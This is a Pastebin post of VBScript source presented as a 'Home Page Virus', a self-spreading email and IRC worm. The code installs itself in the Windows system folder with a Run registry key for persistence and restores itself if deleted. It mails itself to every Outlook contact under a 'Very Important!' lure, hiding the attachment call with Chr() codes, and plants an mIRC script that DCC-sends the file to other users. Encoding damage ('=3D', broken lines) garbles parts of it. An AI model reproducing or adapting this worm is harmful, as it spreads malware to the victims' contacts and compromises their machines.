Advertisement
FlyFar

Home Page Virus Source Code

Feb 24th, 2023 (edited)
1,869
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 3.07 KB | Cybersecurity | 0 0
  1. 'Homepage Created By Robinhood
  2. Set FSO =3D createobject("scripting.filesystemobject")
  3. dirsystem =3D FSO.getspecialfolder(1)
  4. Path=3D dirsystem & "\Win32.dll.vbs"
  5. Set WSH createobject("wscript.shell")
  6. WSH.regwrite
  7. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll",
  8. "wscript.exe " & Path& " %"
  9. FSO.copyfile wscript.scriptfullname, Path
  10. payload=20
  11. If =
  12. WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send
  13. mail") <> 1 then
  14. sendmail
  15. End if
  16. If
  17. WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"
  18. ) <> 1 then
  19. IRC ""
  20. End if
  21. Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
  22. sourcetext sourcefile.readall
  23. sourcefile.close
  24. Do
  25. if not(FSO.fileexists(wscript.scriptfullname)) then
  26. set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
  27. filebackup.write sourcetext
  28. filebackup.close
  29. end if
  30. sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"
  31. )
  32. If s<> "wscript.exe " & Path& " %" then
  33. WSH.regwrite =
  34. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"
  35. end if
  36. s=3D ""
  37. loop=20
  38.  
  39. Function sendmail()
  40. Set myapp =3D CreateObject("Outlook.Application")
  41. If myapp =3D "Outlook" Then
  42. Set myname =3D myapp.GetNameSpace("MAPI")
  43. Set myaddlists =3D myname.AddressLists
  44. For Each myaddlist In myaddlists
  45. If myaddlist.AddressEntries.Count <> 0 Then
  46. x =3D myaddlist.AddressEntries.Count
  47. For i =3D 1 To x
  48. Set mailitem =3D myapp.CreateItem(0)
  49. Set myadd =3D myaddlist.AddressEntries(i)
  50. mailitem.To =3D myadd.Address
  51. mailitem.Subject =3D "Very Important!"
  52. mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
  53. important." & vbcrlf & ""
  54. execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
  55. Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
  56. & Chr(115)
  57. copypath Path
  58. mailitem.DeleteAfterSubmit True
  59. myatts.Add copypath
  60. If mailitem.To <> "" Then
  61. mailitem.Send
  62. End If
  63. Next
  64. End If
  65. Next
  66. End If
  67. End function
  68. Function IRC(ircpath)
  69. If ircpath <> "" Then
  70. programpath
  71. WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion
  72. \ProgramFilesDir")
  73. If FSO.fileexists("c:\mirc\mirc.ini") Then
  74. ircpath =3D "c:\mirc"
  75. ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
  76. ircpath =3D "c:\mirc32"
  77. ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
  78. ircpath =3D programpath & "\mirc"
  79. ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
  80. ircpath =3D programpath & "\mirc"
  81. Else
  82. ircpath =3D ""
  83. End If
  84. End If
  85. If ircpath <> "" Then
  86. Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
  87. text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
  88. text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
  89. text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
  90. text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
  91. send $nick "
  92. text =3D text & Path
  93. text =3D text & vbCrLf & "n3=3D}"
  94. ircscript.write(text)
  95. ircscript.Close
  96. End If
  97. End Function=20
  98.  
  99. Function payload()
  100. Randomize
  101. If 1 + Int(Rnd * 5) =3D 7 then
  102. WSH.run "Http://www.virii.com.ar",false
  103. end if
  104. end function
Tags: robinhood
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement